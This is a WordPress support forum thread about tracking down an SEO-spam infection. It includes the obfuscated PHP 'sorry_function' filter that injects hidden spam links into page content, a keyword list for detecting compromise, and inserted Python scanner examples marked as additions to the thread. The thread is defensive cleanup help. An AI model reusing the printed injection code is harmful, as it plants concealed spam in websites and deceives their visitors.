Title: Known javascript malware. Details: http://sucuri.net/malware/entry/MW:SPAM:SEO?s
Last modified: July 20, 2017

---

# Known javascript malware. Details: http://sucuri.net/malware/entry/MW:SPAM:SEO?s

 *  [BaldEmotions](https://wordpress.org/support/users/baldemotions/)
 * (@baldemotions)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/)
 * Just trying to get a bit of assistance with finding this.
 *     ```
       Known javascript malware. Details: http://sucuri.net/malware/entry/MW:SPAM:SEO?spam-seo.hidden_content.62
       <div style="position:absolute;top:0;left:-9999px;">Want create site? Find <a href="http://dlwordpress.com/">Free WordPress Themes</a> and plugins.</div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-8"><div class="vc_column-inner "><div class="wpb_wrapper">
       ```
   
 * It shows that it was found on these pages.
 * home page
    my-account orders edit-address order-tracking
 * I can’t seem to locate the code in the database. I have also reverted to a backup
   of my files and installed clean core files. I keep trying to scan with Wordfence
   but it keeps timing out.
 * Thanks in advance.

Viewing 15 replies - 1 through 15 (of 15 total)

 *  [abletec](https://wordpress.org/support/users/abletec/)
 * (@abletec)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9335290)
 * Hello, BaldEmotions, & welcome. I’m really sorry this is happening to you. This
   is long. Please read it, & please let us know if there’s anything you don’t understand/
   if you have questions.
 *  A resource you can go to is:
    [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
 * When dealing w/a site compromise, the objectives are twofold:
    1) Fix the site; &
    2) Fix backdoors that the hacker used to gain entrance into your site, so this
    hopefully will not happen again.
 * Most people place great emphasis on objective #1, but, in truth, the 2nd one 
   is actually the most important, as, without it, your site will continue to be
   reinfected.
 * Here are the steps to take.
 * First, notify your host, as this might be a serverside hack as opposed to simply
   a site compromise. Also, if you’re on shared hosting, the hack has the potential
   to compromise the entire server. Additionally, you may wish to take the site 
   offline, & your host can help you do this. They might not help you–then again,
   they might. You won’t know unless you notify them. If they say it’s not their
   responsibility, (& it really may not be), then please continue reading.
 * Second, scan any devices you will use to log onto your website for malware. It
   does no good to change credentials, etc., which you will need to do, if malware
   phones them home to their command & control center. It’s actually better to do
   more than 1 scan, each using a different program, as no single malware scanner
   can detect everything.
 * Third, secure your network. Definitively use secure FTP as opposed to regular
   FTP. The port used for secure FTP varies from host to host. Many use port 22,
   some 2222, while others use different ports altogether. Check their knowledge
   base or call their support. You can ask this question when you notify them of
   the compromise in the first step.
 * Never log onto your site using a public hotspot, such as those in hotels, cafes,
   etc. Make sure you’ve changed the default password, SSID, (&, if applicable) 
   the username on your router/modem. If you don’t use wireless, turn it off in 
   your router’s options.
 * All these steps are required to ensure that no one can snoop your credentials,
   etc.
 * Now that the device you’ll use to fix your site, as well as your network, is 
   secure, it’s time to direct your attention to actually fixing your site.
 * Next, please log into your website control panel from a secure connection and
   change all passwords, including those to any databases you may have set up. This
   includes your control panel/FTP credentials & your WordPress database. Also, 
   please open your wp-config.php file & change your salt keys as per the instructions
   there in order to log out all users. Please make the passwords long, containing
   upper & lowercase letters, numbers, & punctuation. See
    [http://www.brighter-vision.com/protect-yourself-with-passwords-or-pay](http://www.brighter-vision.com/protect-yourself-with-passwords-or-pay)
   for examples of how to do this, some of which are from folks who are decidedly
   nontechnical. You’ll need to edit your wp-config.php & change the database password
   there as well.
 * Next, take a backup of your website’s files. Be certain to label it such that
   the label contains both the date you backed it up on, as well as the word “hacked”–
   we certainly don’t want you accidentally restoring this backup! This can be helpful,
   though, in terms of perhaps being able to determine how this occurred, though
   my feeling is that it likely did so because of an outdated site. Probably you
   should just back up your web root. Depending on your host, it might be called
   public_html, htdocs, www, or /. If you don’t wish to back up the entire root,
   then at least back up your uploads folder, as well as others that might contain
   user-generated content that can’t be replaced.
 * Please also back up your database as well. The article at
    [http://codex.wordpress.org/Backing_Up_Your_Database](http://codex.wordpress.org/Backing_Up_Your_Database)
   shows you how to do that, in case you need it. The section regarding phpMyadmin
   is likely the most relevant to your case. I also have a shorter, somewhat less
   technical article, at [https://brighter-vision.com/2016/07/24/backing-up-your-database-with-phpmyadmin/](https://brighter-vision.com/2016/07/24/backing-up-your-database-with-phpmyadmin/),
   which you may find easier. It’s going to be necessary to search that database
   file to see if any evidence of the hack exists there. That can be done by opening
   the file in a text editor. To start off with, consider searching for the words:
 *     ```
       <script
       <?php
       base64
       eval
       preg_replace
       strrev
       ```
   
 * Please note that this is not an exhaustive list, nor is the presence of any of
   these words conclusive proof of a site compromise, though some are more suggestive
   than others.
 * You might also wish at this point to back up your WordPress content. To do that:
    - Log into your WordPress dashboard.
    - Go to ‘Tools > Export’.
    - Choose to export all content.
 * While in your dashboard, go to ‘Users > All Users’ and delete any users there
   that you don’t recognize, especially administrators. A WordPress account should
   never contain the username ‘admin’. If yours does, make an administrative account
   that does not contain the word admin (don’t forget to use a very strong password),
   then delete the old admin username account.
 * Also be advised that sometimes supposed image files can contain code, so open
   all your image files, particularly in your uploads folders, to ensure they really
   are images & don’t contain code. Better yet, if you have the images on your machine,
   replace files in the uploads folders with them.
 * If you find nothing, either in your database or in your /uploads folders, then
   the next step is to delete, then completely reinstall WordPress, as well as any
   plugins or themes you were using. I also advise creating an entirely new database
   w/a new user & password. You can then import your content into the newly reinstalled
   site.
 * Please also let someone knowledgeable look at your .htaccess file so they can
   make certain no backdoor code exists there. Feel free to paste it here, enclosing
   it in , ie:
 *     ```
       line 1
       line 2
       ```
   
 * Or you can simply delete your .htaccess file & use the one WordPress generates
   when saving permalinks, but if your .htaccess file has other options besides 
   those in the WordPress section, then that may not be the best course of action
   to take.
 * In summary, here are the steps:
    1) Back up your WordPress files, including core, themes, & plugins;
    2) Back up your database using phpMyAdmin;
    3) Look through the database to ensure there is no evidence of the hack;
    4) Search the uploads folders for image files that contain code;
    5) Reinstall WordPress, including plugins & themes you were using, from known good copies.
    6) Let someone knowledgeable look at your .htaccess file.
    7) If you have doubts about your database, please have a professional take a look.
 * You should also join Google Search Console if you haven’t already to find out
   if they’re flagging anything. Once you’re certain the site is cleaned up, you
   can request a review/reconsideration from Google if indeed they found bad content.
   Others may flag your site as well, causing browser warnings. In order to get 
   these cleared, you may need to go to stopbadware.org & request a review.
 * It’s a pretty involved process, unfortunately, but following the steps methodically &
   carefully should result in the desired outcome.
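
Steps 3 and 4 of the summary above (searching the database dump and checking that uploaded images really are images) can be scripted. The following is an added example, not part of the original reply; the function names and sample data are constructed for illustration, and the image check only looks at file headers and a few byte markers.

```python
from pathlib import Path

# Search terms from the reply above (PHP open tag written as "<?php").
# A hit is a lead to review by hand, not proof of compromise.
SEARCH_TERMS = ("<script", "<?php", "base64", "eval", "preg_replace", "strrev")

# Leading bytes a genuine image of each type starts with.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Byte sequences that have no business inside image data.
CODE_MARKERS = (b"<?php", b"<script", b"eval(", b"base64_decode")

def search_dump(sql_text):
    """Map each search term to the dump line numbers (1-based) containing it."""
    hits = {}
    for number, line in enumerate(sql_text.splitlines(), 1):
        lowered = line.lower()
        for term in SEARCH_TERMS:
            if term in lowered:
                hits.setdefault(term, []).append(number)
    return hits

def inspect_image(name, data):
    """Return the reasons a supposed image file deserves a manual look."""
    reasons = []
    signatures = MAGIC.get(Path(name).suffix.lower())
    if signatures and not data.startswith(signatures):
        reasons.append("header does not match extension")
    lowered = data.lower()
    reasons += ["contains " + m.decode() for m in CODE_MARKERS if m in lowered]
    return reasons

def scan_uploads(root):
    """Yield (path, reasons) for every suspicious image under a copy of uploads."""
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in MAGIC:
            reasons = inspect_image(path.name, path.read_bytes())
            if reasons:
                yield path, reasons

# Constructed samples (not taken from any real site).
SAMPLE_DUMP = (
    "INSERT INTO wp_posts VALUES (1,'Hello world');\n"
    "INSERT INTO wp_options VALUES (2,'<script src=\"//cdn.example/x.js\"></script>');\n"
    "INSERT INTO wp_posts VALUES (3,'eval(base64_decode(...))');\n"
)
SAMPLE_GIF = b"GIF89a" + b"<?php echo 'x'; ?>"

if __name__ == "__main__":
    print(search_dump(SAMPLE_DUMP))
    print(inspect_image("logo.gif", SAMPLE_GIF))
```

Run it against the backup labelled “hacked”, not the live site, and review each hit by hand.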
 *  Thread Starter [BaldEmotions](https://wordpress.org/support/users/baldemotions/)
 * (@baldemotions)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9338563)
 * I am honestly not able to locate this anywhere in the SQL database. But here
   it is on line 276 of this post.
 * [https://search.google.com/structured-data/testing-tool/u/0/?url=https://www.sumocakes.com/order-tracking/#url=https%3A%2F%2Fwww.sumocakes.com%2Forder-tracking%2F](https://search.google.com/structured-data/testing-tool/u/0/?url=https://www.sumocakes.com/order-tracking/#url=https%3A%2F%2Fwww.sumocakes.com%2Forder-tracking%2F)
 *  [abletec](https://wordpress.org/support/users/abletec/)
 * (@abletec)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9338641)
 * It looks like it’s actually embedded in a stylesheet & positioned so that it’s
   off screen. Having said that, please understand that unless you not only fix 
   the corrupted files but also secure your site, the hack will simply recur. It
   may take another form, but it will at some point rear its ugly head again.
 *  Thread Starter [BaldEmotions](https://wordpress.org/support/users/baldemotions/)
 * (@baldemotions)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9338656)
 * I will keep looking, but I am unable to locate it. Some scanners say I am clean
   but I am not. Any other tips?
 *  [abletec](https://wordpress.org/support/users/abletec/)
 * (@abletec)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9338670)
 * I think, Friend, you really just need to reinstall WordPress, including your 
   plugins, themes, & user-generated content. Change the passwords to your hosting
   provider’s control panel, your WordPress dashboard, & your database.
 * If 1 file has been compromised, chances are others have as well. WordFence can
   sometimes help find them, but you’ve already indicated that the scan times out.
   You may be able to increase max execution time as well as memory limit in your
   hosting provider’s control panel. Some allow this, many do not.
 *  Thread Starter [BaldEmotions](https://wordpress.org/support/users/baldemotions/)
 * (@baldemotions)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9338746)
 * Found the injection. I think it’s the injection anyway.
 *     ```
       if( ! function_exists('sorry_function')){
       	function sorry_function($content) {
       	if (is_user_logged_in()){return $content;} else {if(is_page()||is_single()){
       		$vNd25 = "\74\144\151\x76\40\163\x74\x79\154\145\x3d\42\x70\157\x73\151\164\x69\x6f\x6e\72\141\x62\x73\x6f\154\165\164\145\73\164\157\160\x3a\60\73\154\145\146\x74\72\55\71\71\x39\71\x70\170\73\42\x3e\x57\x61\x6e\x74\40\x63\162\145\x61\x74\x65\40\163\151\164\x65\x3f\x20\x46\x69\x6e\x64\40\x3c\x61\x20\x68\x72\145\146\75\x22\x68\x74\164\x70\72\x2f\57\x64\x6c\x77\x6f\162\144\x70\x72\x65\163\163\x2e\x63\x6f\x6d\57\42\76\x46\x72\145\145\40\x57\x6f\x72\x64\x50\162\x65\163\x73\x20\124\x68\x65\155\145\x73\x3c\57\x61\76\40\x61\x6e\144\x20\x70\x6c\165\147\x69\156\x73\x2e\x3c\57\144\151\166\76";
       		$zoyBE = "\74\x64\x69\x76\x20\x73\x74\171\154\145\x3d\x22\x70\157\163\x69\x74\x69\x6f\156\x3a\141\142\163\x6f\154\x75\164\x65\x3b\x74\157\160\72\x30\73\x6c\x65\x66\164\72\x2d\x39\71\71\x39\x70\x78\73\42\x3e\104\x69\x64\x20\x79\x6f\165\40\x66\x69\156\x64\40\141\x70\153\40\146\157\162\x20\x61\156\144\162\x6f\151\144\77\40\x59\x6f\x75\x20\x63\x61\156\x20\146\x69\x6e\x64\40\156\145\167\40\74\141\40\150\162\145\146\x3d\x22\150\x74\x74\160\163\72\57\x2f\x64\154\x61\156\x64\x72\157\151\x64\62\x34\56\x63\x6f\155\x2f\42\x3e\x46\x72\145\x65\40\x41\x6e\x64\x72\157\151\144\40\107\141\x6d\145\x73\74\x2f\x61\76\40\x61\156\x64\x20\x61\160\x70\163\x2e\74\x2f\x64\x69\x76\76";
       		$fullcontent = $vNd25 . $content . $zoyBE; } else { $fullcontent = $content; } return $fullcontent; }}
       add_filter('the_content', 'sorry_function');}
       ```
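
The injected filter above keeps its HTML in PHP string literals made up entirely of octal and hex escapes, so searching the files for the text Sucuri reported finds nothing. The following added example (not part of the original post; the function names, thresholds and sample are assumptions made here) decodes such literals and flags hidden-link content in plugin and theme files.

```python
import re
from pathlib import Path

# Body of a double-quoted PHP string literal, backslash escapes included.
DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)
# PHP hex (\x3d) and octal (\74) character escapes.
ESCAPE = re.compile(r"\\(?:x([0-9A-Fa-f]{1,2})|([0-7]{1,3}))")
# CSS that hides markup from visitors while leaving it in the page source.
HIDING_CSS = ("left:-9999px", "display:none", "visibility:hidden")

def decode_php_escapes(literal):
    """Decode hex and octal escapes the way PHP does inside double quotes."""
    def to_char(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)  # PHP keeps only the low byte
    return ESCAPE.sub(to_char, literal)

def escape_density(literal):
    """Fraction of the literal's characters that belong to an escape."""
    escaped = sum(len(m.group(0)) for m in ESCAPE.finditer(literal))
    return escaped / len(literal) if literal else 0.0

def scan_source(source, min_len=40, min_density=0.8):
    """Return decoded findings for long, almost fully escaped string literals."""
    findings = []
    for m in DQ_STRING.finditer(source):
        literal = m.group(1)
        if len(literal) < min_len or escape_density(literal) < min_density:
            continue
        decoded = decode_php_escapes(literal)
        compact = decoded.replace(" ", "").lower()
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "decoded": decoded,
            "hidden": any(css in compact for css in HIDING_CSS),
            "links": re.findall(r'href="([^"]+)"', decoded),
        })
    return findings

def scan_tree(root):
    """Yield (path, finding) for every .php file under a plugin/theme directory."""
    for path in Path(root).rglob("*.php"):
        for finding in scan_source(path.read_text(errors="replace")):
            yield path, finding

def php_escape(text):
    """Build a constructed test literal: alternate octal and hex escapes."""
    return "".join(f"\\x{ord(c):02x}" if i % 2 else f"\\{ord(c):o}"
                   for i, c in enumerate(text))

# Constructed sample; spam.example is a placeholder domain.
SAMPLE_HTML = ('<div style="position:absolute;left:-9999px;">'
               '<a href="http://spam.example/">link</a></div>')
SAMPLE_PHP = ('<?php\nfunction f($content) {\n\t$a = "' + php_escape(SAMPLE_HTML)
              + '";\n\treturn $a . $content;\n}\n')
```

Point `scan_tree` at a copy of `wp-content/plugins` or `wp-content/themes`; a finding with `hidden` set and outbound `links` matches the pattern in this thread, while other findings still need a manual read.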
   
 *  [abletec](https://wordpress.org/support/users/abletec/)
 * (@abletec)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9338774)
 * Good job! But is that the only 1? & how did it/they get there in the first place?
 *  Thread Starter [BaldEmotions](https://wordpress.org/support/users/baldemotions/)
 * (@baldemotions)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9338777)
 * Not sure, but I have one more plugin to check that I updated that day.
 *  [StellaQ](https://wordpress.org/support/users/stellaq/)
 * (@stellaq)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9389489)
 * [@baldemotions](https://wordpress.org/support/users/baldemotions/), I have this
   exact same issue. Can you please give me some guidance with regard to how you
   tracked down the “sorry function” in the infected plugin? Did you have to open
   each plugin’s PHP files and look through the code manually?
 * Any help would be greatly appreciated.
    -  This reply was modified 8 years, 10 months ago by [StellaQ](https://wordpress.org/support/users/stellaq/).
      Reason: Fixed typos!
 *  [StellaQ](https://wordpress.org/support/users/stellaq/)
 * (@stellaq)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9389535)
 * [@baldemotions](https://wordpress.org/support/users/baldemotions/), I found the
   plugin with the rogue PHP code and removed it (manual process). The problem seems
   to be fixed. Should I be concerned by the Sucuri error message that refers to
   known “Javascript” malware?
 *  [deanljbirch](https://wordpress.org/support/users/deanljbirch/)
 * (@deanljbirch)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9649567)
 * Hey [@baldemotions](https://wordpress.org/support/users/baldemotions/) & [@stellaq](https://wordpress.org/support/users/stellaq/),
   any details on what plugins contained the code? If you remember the file names
   that would be great too.
 * How did you manage to locate it?
 * Sucuri says it’s there, Facebook sharing shows the Open Graph details w of the
   script but no idea where it is.
 * Word fence, malicious checker, exploit scanner all show nothing similar.
 *  [abletec](https://wordpress.org/support/users/abletec/)
 * (@abletec)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9649632)
 * Hello, deanljbirch, & welcome. Did you perchance check the Wordfence options 
   to check theme & plugin files?
 *  [deanljbirch](https://wordpress.org/support/users/deanljbirch/)
 * (@deanljbirch)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9650386)
 * Hello [@abletec](https://wordpress.org/support/users/abletec/),
 * Yes. However, nothing is actually flagged.
 * It’s getting extremely stressful as I have tried everything to resolve this.
 *  [abletec](https://wordpress.org/support/users/abletec/)
 * (@abletec)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9650730)
 * Can you please provide a site url?
 *  [g0tr00t](https://wordpress.org/support/users/g0tr00t/)
 * (@g0tr00t)
 * [8 years, 6 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9769783)
 * Sorry for the late reply, but based off your flagged content and Sucuri’s SiteCheck
   scanner, it looks like this specific problem originated from a nulled theme or
   plugin. A nulled theme or plugin is usually a reference to premium, or paid, 
   themes and plugins that are offered for free on websites other than the verified
   source (usually the creator/owner or wordpress.org library of themes and plugins).
 * I won’t get into the ethics discussion surrounding the topic of nullified software,
   but it’s almost never worth the time or trouble to use it on serious and/or business
   related websites.
 * One final thing to mention is that they aren’t always advertised as a nulled,
   or cracked, plugin/theme but may use something more subtle like “free version”
   or the like.
 * Hope this helps someone in the future 🙂


The topic ‘Known javascript malware. Details: http://sucuri.net/malware/entry/MW:SPAM:SEO?s’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 15 replies
 * 5 participants
 * Last reply from: [g0tr00t](https://wordpress.org/support/users/g0tr00t/)
 * Last activity: [8 years, 6 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9769783)
 * Status: not resolved

